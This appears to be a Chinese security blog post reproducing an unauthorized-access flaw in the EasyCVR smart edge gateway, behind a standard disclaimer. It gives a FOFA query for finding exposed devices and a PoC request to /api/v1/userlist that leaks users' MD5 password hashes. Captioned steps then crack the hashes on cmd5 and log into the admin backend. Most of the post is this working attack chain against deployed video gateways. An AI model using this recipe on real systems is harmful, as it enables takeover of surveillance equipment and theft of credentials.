漏洞复现--EasyCVR智能边缘网关未授权访问

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

一:漏洞描述

EasyCVR智能边缘网关是TSINGSEE青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI智能检测、处理、分发等服务。该设备userlist接口存在信息泄露,攻击者可获得md5加密后的密码以进行后续测试。

二:漏洞影响版本

–EasyCVR智能边缘网关

三:网络空间测绘查询

fofa:title="EasyCVR"
漏洞复现--EasyCVR智能边缘网关未授权访问_第1张图片

四:漏洞复现

poc:
GET /api/v1/userlist?pageindex=0&pagesize=10
漏洞复现--EasyCVR智能边缘网关未授权访问_第2张图片
漏洞复现--EasyCVR智能边缘网关未授权访问_第3张图片
cmd5解密
漏洞复现--EasyCVR智能边缘网关未授权访问_第4张图片
登录后台
漏洞复现--EasyCVR智能边缘网关未授权访问_第5张图片

你可能感兴趣的:(漏洞复现,网络安全,web安全,安全)